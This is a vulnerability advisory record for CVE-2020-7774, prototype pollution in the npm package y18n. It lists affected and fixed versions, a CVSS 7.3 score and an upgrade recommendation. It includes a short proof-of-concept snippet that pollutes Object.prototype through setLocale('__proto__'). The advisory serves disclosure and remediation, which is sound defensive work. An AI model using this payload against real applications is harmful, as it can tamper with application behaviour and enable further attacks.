GHSA-c4w7-xm78-47vh

Suggest an improvement
Source
https://github.com/advisories/GHSA-c4w7-xm78-47vh
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/03/GHSA-c4w7-xm78-47vh/GHSA-c4w7-xm78-47vh.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-c4w7-xm78-47vh
Aliases
  • CVE-2020-7774
  • SNYK-JAVA-ORGWEBJARSNPM-1038306
  • SNYK-JS-Y18N-1021887
Published
2021-03-29T16:05:12Z
Modified
2023-11-01T05:44:41.829854Z
Severity
  • 7.3 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L CVSS Calculator
Summary
Prototype Pollution in y18n
Details

Overview

The npm package y18n before versions 3.2.2, 4.0.1, and 5.0.5 is vulnerable to Prototype Pollution.

POC

const y18n = require('y18n')();

y18n.setLocale('__proto__');
y18n.updateLocale({polluted: true});

console.log(polluted); // true

Recommendation

Upgrade to version 3.2.2, 4.0.1, 5.0.5 or later.

References

Affected packages

npm / y18n

Package

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
3.2.2

Ecosystem specific

{
    "affected_functions": [
        "(y18n)"
    ]
}

npm / y18n

Package

Affected ranges

Type
SEMVER
Events
Introduced
4.0.0
Fixed
4.0.1

Affected versions

4.*

4.0.0

Ecosystem specific

{
    "affected_functions": [
        "(y18n)"
    ]
}

npm / y18n

Package

Affected ranges

Type
SEMVER
Events
Introduced
5.0.0
Fixed
5.0.5

Ecosystem specific

{
    "affected_functions": [
        "(y18n)"
    ]
}